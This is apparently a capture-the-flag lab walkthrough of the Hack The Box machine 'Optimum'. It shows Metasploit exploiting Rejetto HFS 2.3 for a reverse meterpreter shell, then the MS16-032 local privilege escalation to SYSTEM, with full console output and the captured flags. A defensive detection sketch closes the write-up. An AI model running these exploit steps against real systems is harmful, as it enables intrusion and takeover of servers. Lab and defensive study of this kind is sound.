HTB | Optimum
Walkthrough
Time to Root Machine: ~30min
Write-up Date(s): 4/23/2021
Last Edited: 4/23/2021
Assuming we already have a connection to HTB's network, let's go ahead and scan 10.10.10.8's ports with Nmap:

```
┌──(root💀kali)-[~]
└─# nmap -p- -A -T4 10.10.10.8
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-23 11:25 EDT
Nmap scan report for 10.10.10.8
Host is up (0.077s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   49.01 ms 10.10.16.1
2   96.49 ms 10.10.10.8

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.43 seconds
```
Alright, let's take a look at the important information from the scan. For one thing, port 80 [http] is the only open port. The version of the HTTP server is also listed: HttpFileServer httpd 2.3. Let's go ahead and use a browser to view what the HTTP server is serving up:
As the scan suggests, a browser-based file server is displayed when the site is viewed in a browser. We can see that the server information [version] shown on the page is consistent with the scan, as well. Now that we have confirmed the server version, let's see if we can find any quick exploits for it:

```
┌──(root💀kali)-[~]
└─# searchsploit httpfileserver 2.3
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)        | windows/webapps/49125.py
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
Awesome! So, it looks like we have a potential RCE [Remote Code Execution] exploit, and there is a Metasploit module for it [found via a quick Google search]. Let's spin up Metasploit Framework [msfconsole] and see if this exploit is effective against the server:

```
┌──(root💀kali)-[~]
└─# msfconsole
       =[ metasploit v6.0.41-dev                          ]
+ -- --=[ 2122 exploits - 1138 auxiliary - 360 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Enable verbose logging with set VERBOSE true

msf6 > use exploit/windows/http/rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.10.8
RHOSTS => 10.10.10.8
msf6 exploit(windows/http/rejetto_hfs_exec) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.16.169:4444
[*] Using URL: http://0.0.0.0:8080/U8QpZnFmvLnu
[*] Local IP: http://10.0.2.15:8080/U8QpZnFmvLnu
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /U8QpZnFmvLnu
[*] Sending stage (175174 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\jEkMo.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.16.169:4444 -> 10.10.10.8:49162) at 2021-04-28 13:06:19 -0400
[*] Server stopped.

meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
```
Great! We popped a meterpreter shell using the exploit. We have gathered the server name and username, OPTIMUM\kostas, and basic system information from the meterpreter commands getuid and sysinfo. Since this is a Windows server, let's start a Windows shell from within the meterpreter session, see how much information we can access as the current user [kostas], and maybe grab the user flag:

```
C:\Users\kostas\Desktop> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D0BC-0196

 Directory of C:\Users\kostas\Desktop

05/05/2021  05:09    <DIR>          .
05/05/2021  05:09    <DIR>          ..
05/05/2021  05:09    <DIR>          %TEMP%
18/03/2017  03:11           760.320 hfs.exe
18/03/2017  03:13                32 user.txt.txt
               2 File(s)        760.352 bytes
               3 Dir(s)  31.895.089.152 bytes free

C:\Users\kostas\Desktop> type user.txt.txt
type user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73
```
The user flag, d0c39409d7b994a9a1389ebf38ef5f73, has been found! Let's navigate further through the system and see if we can get the root flag:

```
C:\Users\kostas\Desktop> cd ../../
cd ../../

C:\Users> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D0BC-0196

 Directory of C:\Users

18/03/2017  02:57    <DIR>          .
18/03/2017  02:57    <DIR>          ..
18/03/2017  02:52    <DIR>          Administrator
18/03/2017  02:57    <DIR>          kostas
22/08/2013  06:39    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  31.895.089.152 bytes free

C:\Users> cd Administrator
cd Administrator
Access is denied.
```
Looks like we were denied access to the Administrator directory, which holds the root flag. Since we cannot access the Administrator directory that easily, we will have to use some local privilege escalation techniques in order to get that access. First, we exit the Windows shell and background the meterpreter session. After that, we can try Metasploit's suggester module and see if it finds a local exploit to escalate our privileges:

```
C:\Users> exit
exit
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/http/rejetto_hfs_exec) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester

Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(windows/http/rejetto_hfs_exec) > use 0
msf6 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.8 - Collecting local exploits for x86/windows...
[*] 10.10.10.8 - 37 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Post module execution completed
```
After running the suggester module, we have two exploits that could potentially escalate our privileges on this Windows server. Let's grab the exploit/windows/local/ms16_032_secondary_logon_handle_privesc module and give that one a shot:

```
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options

Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 10.10.16.169:4444
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\OTCGvsJEVCfEy.ps1...
[*] Compressing script contents...
[+] Compressed size: 3600
[*] Executing exploit script...
[by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2112

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 2088
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

njGhibBIKeyyOf447q7zBALrqiXDcVA7
[+] Executed on target machine.
[*] Sending stage (175174 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.16.169:4444 -> 10.10.10.8:49163) at 2021-04-28 13:42:02 -0400
[+] Deleted C:\Users\kostas\AppData\Local\Temp\OTCGvsJEVCfEy.ps1

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows
```
And just like that, we have escalated our local privileges to NT AUTHORITY\SYSTEM! We can now pop another Windows shell, navigate into the Administrator directory and grab that root flag:

```
C:\Users> cd Administrator
cd Administrator

C:\Users\Administrator> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D0BC-0196

 Directory of C:\Users\Administrator

18/03/2017  02:52    <DIR>          .
18/03/2017  02:52    <DIR>          ..
18/03/2017  02:52    <DIR>          Contacts
18/03/2017  03:14    <DIR>          Desktop
18/03/2017  02:52    <DIR>          Documents
18/03/2017  02:52    <DIR>          Downloads
18/03/2017  02:52    <DIR>          Favorites
18/03/2017  02:52    <DIR>          Links
18/03/2017  02:52    <DIR>          Music
18/03/2017  02:52    <DIR>          Pictures
18/03/2017  02:52    <DIR>          Saved Games
18/03/2017  02:52    <DIR>          Searches
18/03/2017  02:52    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  31.893.983.232 bytes free

C:\Users\Administrator> cd Desktop
cd Desktop

C:\Users\Administrator\Desktop> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D0BC-0196

 Directory of C:\Users\Administrator\Desktop

18/03/2017  03:14    <DIR>          .
18/03/2017  03:14    <DIR>          ..
18/03/2017  03:14                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  31.893.983.232 bytes free

C:\Users\Administrator\Desktop> type root.txt
type root.txt
51ed1b36553c8461f4552c2e92b3eeed
```
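From the defender's side, both Metasploit modules used above leave recognisable process-creation artifacts: the HFS exploit runs a .vbs dropped in %TEMP% under the file server's own account, and MS16-032 writes a .ps1 to the user's Temp directory and runs it with the 32-bit (SysWOW64) PowerShell on a 64-bit host. The following Python is an added detection sketch, not part of this write-up or of Metasploit; the Sysmon-style field names and the sample events are constructed assumptions modelled on the paths shown in the session output.

```python
"""Detection sketch (added example): flag process-creation patterns matching
the artifacts left by the HFS RCE and MS16-032 modules. Event fields are
Sysmon Event ID 1 style and are an assumption, not a real log format."""
import re

WEB_SERVERS = {"hfs.exe"}
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
TEMP_DIR = re.compile(r"(\\appdata\\local\\temp\\|%temp%\\)", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|ps1|bat)\b", re.I)


def classify(event):
    """Return the list of alert names raised by one process-creation event."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    alerts = []
    # Rule 1: a file-server process spawning a shell or script host.
    if parent in WEB_SERVERS and image in SCRIPT_HOSTS:
        alerts.append("web-server-spawned-interpreter")
    # Rule 2: a script host running a script file located in a Temp directory.
    if image in SCRIPT_HOSTS and TEMP_DIR.search(cmd) and SCRIPT_EXT.search(cmd):
        alerts.append("script-from-temp")
    # Rule 3: 32-bit PowerShell launched from SysWOW64 (unusual on a 64-bit server).
    if image == "powershell.exe" and "\\syswow64\\" in event["Image"].lower():
        alerts.append("wow64-powershell")
    return alerts


# Constructed sample events, modelled on the %TEMP%\jEkMo.vbs and
# AppData\Local\Temp\OTCGvsJEVCfEy.ps1 paths seen in the session output.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\kostas\Desktop\hfs.exe",
     "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript.exe //nologo %TEMP%\jEkMo.vbs",
     "User": r"OPTIMUM\kostas"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -f C:\Users\kostas\AppData\Local\Temp\OTCGvsJEVCfEy.ps1",
     "User": r"OPTIMUM\kostas"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "User": r"OPTIMUM\kostas"},
]


def scan(events=SAMPLE_EVENTS):
    """Map each event index to its alerts; benign events map to an empty list."""
    return {i: classify(e) for i, e in enumerate(events)}


if __name__ == "__main__":
    for i, hits in scan().items():
        print(i, hits or "clean")
```

Each rule on its own is noisy on a busy host; correlating rule 1 with rule 2 in the same process tree is what makes the HFS case high-confidence.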
ROOT FLAG: 51ed1b36553c8461f4552c2e92b3eeed
USER [kostas] FLAG: d0c39409d7b994a9a1389ebf38ef5f73